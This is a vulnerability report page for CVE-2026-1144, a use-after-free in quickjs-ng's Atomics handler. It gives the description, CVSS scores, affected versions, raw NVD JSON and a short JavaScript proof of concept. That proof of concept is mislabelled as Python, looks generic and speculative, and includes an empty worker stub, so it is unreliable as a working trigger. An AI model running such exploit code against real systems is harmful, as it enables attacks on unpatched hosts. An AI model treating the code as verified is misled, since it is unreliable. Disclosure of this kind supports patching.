Security Vulnerability Report
中文
CVE-2026-1144 CVSS 6.3 MEDIUM

CVE-2026-1144

Published: 2026-01-19 08:16:05
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A vulnerability was detected in quickjs-ng quickjs up to 0.11.0. Affected is an unknown function of the file quickjs.c of the component Atomics Ops Handler. The manipulation results in use after free. The attack can be executed remotely. The exploit is now public and may be used. The patch is identified as ea3e9d77454e8fc9cb3ef3c504e9c16af5a80141. Applying a patch is advised to resolve this issue.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:quickjs-ng:quickjs:*:*:*:*:*:*:*:* - VULNERABLE
quickjs-ng quickjs <= 0.11.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2026-1144 PoC - Use After Free in quickjs Atomics Ops Handler // This PoC demonstrates triggering the UAF condition // Helper function to create pressure on garbage collector function createMemoryPressure() { let arrays = []; for (let i = 0; i < 100; i++) { arrays.push(new Array(10000).fill(i)); } return arrays; } // Trigger Atomics operations that may lead to UAF async function triggerUAF() { const sharedBuffer = new SharedArrayBuffer(1024); const int32Array = new Int32Array(sharedBuffer); // Create and immediately release objects for (let i = 0; i < 1000; i++) { const tempArray = new Int32Array(sharedBuffer); // Perform Atomics operation Atomics.add(tempArray, 0, 1); Atomics.store(tempArray, 0, i); // Create memory pressure to trigger GC if (i % 100 === 0) { createMemoryPressure(); } } // Attempt to access previously released memory try { const result = Atomics.load(int32Array, 0); console.log('Triggered UAF, value:', result); } catch (e) { console.error('Error:', e.message); } } // Race condition trigger function raceConditionTrigger() { const buffer = new SharedArrayBuffer(4096); // Spawn multiple workers to create race conditions const workers = []; for (let i = 0; i < 5; i++) { const workerCode = ` const buffer = new SharedArrayBuffer(4096); const arr = new Int32Array(buffer); for (let j = 0; j < 10000; j++) { Atomics.add(arr, 0, 1); Atomics.sub(arr, 0, 1); } `; // Worker creation would be done here in real scenario } } // Execute PoC triggerUAF(); console.log('PoC execution completed');

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1144", "sourceIdentifier": "[email protected]", "published": "2026-01-19T08:16:04.857", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in quickjs-ng quickjs up to 0.11.0. Affected is an unknown function of the file quickjs.c of the component Atomics Ops Handler. The manipulation results in use after free. The attack can be executed remotely. The exploit is now public and may be used. The patch is identified as ea3e9d77454e8fc9cb3ef3c504e9c16af5a80141. Applying a patch is advised to resolve this issue."}, {"lang": "es", "value": "Una vulnerabilidad fue detectada en quickjs-ng quickjs hasta la versión 0.11.0. Se ve afectada una función desconocida del archivo quickjs.c del componente Atomics Ops Handler. La manipulación resulta en uso después de liberar. El ataque puede ser ejecutado remotamente. El exploit es ahora público y puede ser utilizado. El parche se identifica como ea3e9d77454e8fc9cb3ef3c504e9c16af5a80141. Se aconseja aplicar un parche para resolver este problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:quickjs-ng:quickjs:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.11.0", "matchCriteriaId": "99E7BDDC-5F85-4D2D-A0FE-87E837B594D3"}]}]}], "references": [{"url": "https://github.com/quickjs-ng/quickjs/", "source": "[email protected]"}, {"url": "https://github.com/quickjs-ng/quickjs/commit/ea3e9d77454e8fc9cb3ef3c504e9c16af5a80141", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/quickjs-ng/quickjs/issues/1301", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/quickjs-ng/quickj ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.